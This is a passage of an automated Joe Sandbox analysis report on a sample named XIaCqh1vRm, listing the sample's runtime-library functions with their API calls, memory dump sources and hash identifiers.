                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A136A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                          • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                          • Instruction ID: b688c43a0d78029303f3726da037d7ece2edc5ebd6e53a3e4cfd1592b8ff110b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0B431641704A7AF147EBA08316BE35975FB1314F04416FE51AAF3C0DFB19E059B94
                                                                                                                                                                                                                                                                          Function 024AD074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024AD088
                                                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024AD0AC
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024AD0BF
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024AD0CD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                          • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction ID: b0a4eca62322b1d84707fac2300e90fa9110b837576241020249691defa0fa32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF05935E04204E7C724FB16D862C9EB77A8EB0B18360852FD80517685DB31A90ACEA1
                                                                                                                                                                                                                                                                          Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                          Function 02495A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 02495A83
                                                                                                                                                                                                                                                                          • __Cnd_signal.LIBCPMT ref: 02495A8F
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 02495AA4
                                                                                                                                                                                                                                                                          • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02495AAB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                          • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction ID: 1d291883ecb988132d4ad8f1209f9f805ce79026a3dbe43b70d27fdf92383c51
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0A031400701AFEF31BB73D80671A7BA2AF00328F14481FE05A969A0CFBAE8588E55
                                                                                                                                                                                                                                                                          Function 024A2858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024A286F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,024A8830,?,?,?,?,00000000,?,00000000), ref: 024A287E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2894
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A28A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction ID: 5b178edeeb9e694e79348fd3ea74aa3d72978b0baca00257bc04dd5c53f34f05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F0A07450010ABBCF00EFE5CD44EAF37B86B00701F20061AB914E20A0DB74D604AB64
                                                                                                                                                                                                                                                                          Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 200240550-0
                                                                                                                                                                                                                                                                          • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                          • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                          Function 024A257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___crtCreateEventExW.LIBCPMT ref: 024A2593
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,024A0DA0), ref: 024A25A1
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A25B7
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A25C5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 200240550-0
                                                                                                                                                                                                                                                                          • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                          • Instruction ID: 3a96b71ea9408bb28c296cf4102a922ad59a4c9c7cf212227c5e00dea17457b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91E0D861A002153AEB10F7768C26F7F369C9B20B41F84085BBD14E11C1FAD4D10059B4
                                                                                                                                                                                                                                                                          Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                          • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                          • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                                                          Function 024A9530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024A2959: TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024B3BE6
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024B3BF8
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B3C0E
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B3C1C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                          • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                          • Instruction ID: b3c97a95c1233cc29df054eb62f286d4cf722dc31770e959dbb7d71aa340c71b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFE061745042016FC700FF775C556BF3A686E007017100E7BE529D2191EB34D0454F7C
                                                                                                                                                                                                                                                                          Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                          • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                                                          Function 024A2794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A279E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A27AD
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A27C3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A27D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                          • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction ID: 86d11cf1b1ea1a6c194e31be25a5354771eedb02b7757a04601ed483c977df47
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE0867C60010AA7CB00FBB6DD49EAF73BC6E10B05B600566A905E3150EBA8D7089B79
                                                                                                                                                                                                                                                                          Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                                                          Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                          • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                                                          Function 024A28EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024A2904
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A291A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2928
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction ID: df36c4138965ba6795728a2015c1251380815ce3c20f7dd82acac46429a2ea21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0863460010967DB14FF72CC05BBB376C7F10B45B500926BD19D20A0EB75D1049AA8
                                                                                                                                                                                                                                                                          Function 024A29B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,00000000,024A7BD8,00000000,?,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29BE
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024A29CA
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A29E0
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A29EE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                          • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction ID: ea74fe14828d9e44e23c0c8f59f6b3d5d4302b0e7e13ed2f12297a5d37604dbd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E086742001096BDB10FF71CC08BBF376C7F10B45B500926BD19D10A0EB75D114AAA8
                                                                                                                                                                                                                                                                          Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
